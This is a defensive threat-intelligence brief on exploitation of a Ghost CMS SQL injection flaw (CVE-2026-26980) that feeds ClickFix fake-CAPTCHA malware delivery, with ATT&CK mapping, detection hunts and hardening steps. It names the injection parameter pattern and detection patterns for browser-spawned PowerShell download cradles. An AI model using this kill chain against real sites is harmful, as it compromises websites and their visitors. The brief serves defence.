Home · Live brief · Daily brief 2026-05-25
Ghost CMS CVE-2026-26980 → ClickFix: the CMS-compromise-to-endpoint kill chain
Entities: SentinelOne
Part of run 2026-05-25-d675ef38 (intel · unknown)
Background. CVE-2026-26980 was disclosed and patched in Ghost 6.19.1 on 19 February 2026, and SentinelOne reported in-the-wild exploitation and detection guidance by 27 February (BleepingComputer, 2026-05-24). The May activity XLab documented is not a new bug but a large-scale weaponisation of the unpatched long tail of self-hosted instances, repurposing compromised editorial sites as a high-traffic, low-attributable delivery surface for ClickFix social engineering (XLab Qianxin, 2026-05-21). ClickFix / FakeCaptcha — tricking a user into pasting an attacker-supplied command into the Run dialog or a terminal — has been a tracked initial-access technique since 2024; what is notable here is the combination of a CVSS-9.4 pre-auth CMS flaw as the distribution mechanism with a fingerprinting/cloaking stage that keeps the lure invisible to non-targets and to casual review.
Kill chain → MITRE ATT&CK.
- Initial access —
T1190Exploit Public-Facing Application. Unauthenticated boolean-based blind SQL injection through the Content API'sslugfilter parameter. No credentials, no user interaction — the request pattern the vendor mitigation keys on is a query string containingslug:[(slug%3A%5B). - Credential access —
T1552Unsecured Credentials. The injection is used to read the admin API key out of Ghost's database. This key is a bearer token with full content-management scope, so its theft is the privilege pivot — there is no separate authentication step after extraction. - Content injection / defacement —
T1659Content Injection. With the admin key the attacker injects a lightweight JavaScript loader into published articles and/or theme templates, so the malicious code is served to every visitor from the site's own trusted origin. - Execution-guardrails cloaking —
T1480Execution Guardrails. The loader fetches a second-stage cloaking script that fingerprints each visitor and only proceeds for those matching the target profile (e.g. Windows desktop), so most visitors and most analysts never see the lure. - User execution —
T1204.002User Execution: Malicious File, chained toT1059.001PowerShell /T1059.003Windows Command Shell. Qualifying visitors are shown a fake Cloudflare "verify you are human" prompt in an overlay iframe instructing them to paste a supplied command into the Windows Run dialog (Win+R) or a terminal. - Payload delivery —
T1105Ingress Tool Transfer. The pasted command pulls follow-on payloads; XLab observed DLL loaders, JavaScript droppers, and an Electron-based sample namedUtilifySetup.exe, leading to info-stealer / RAT capability.
Detection concepts (no IOCs). Two distinct hunt surfaces:
- Server-side, for Ghost operators. Review web-server / reverse-proxy access logs for Content API requests to
/ghost/api/content/whosefilter/slugparameter containsslug:[(slug%3A%5B) or boolean-blind SQL artefacts (AND,CASE, time-delay primitives) — the vendor mitigation pattern is the highest-fidelity signal. In the Ghost admin audit trail, alert on unexpected article or theme modifications, and on any<script>element appearing in post content or theme files that has no editorial counterpart. - Client-side, for everyone (the product-agnostic, higher-value hunt). The ClickFix execution chain is independent of Ghost and is the artefact most defenders can actually catch: Sysmon Event ID 1 / Windows 4688 for
cmd.exeorpowershell.exe(especially with-EncodedCommand, clipboard-paste context,mshta,curl/certutildownload cradles) whose parent process is a browser (chrome.exe,msedge.exe,firefox.exe,brave.exe) orexplorer.exeimmediately following aWin+RRun-dialog launch. Flag execution of unsigned Electron applications from user-writable paths. Enable PowerShell Script Block Logging (Event ID 4104) to capture the pasted stager body.
Hardening / mitigation.
- Ghost: upgrade to 6.19.1 or later; until then block
slug:[/slug%3A%5Bat the WAF and restrict the public Content API to trusted origins. Assume the admin API key was stolen on any internet-exposed instance — rotate it after patching and audit all posts and theme files for injected scripts. - Endpoint (the ClickFix surface, applies broadly): where operationally feasible, disable the
Win+RRun dialog for standard users via theNoRunpolicy (GPO), deploy detection for clipboard-to-shell execution, and run user-awareness that any web page asking you to "paste this command to prove you are human" is an attack. Constrained Language Mode plus full PowerShell logging reduces the blast radius of a successful paste.
“Background.” — ctipilot v2 brief (migrated)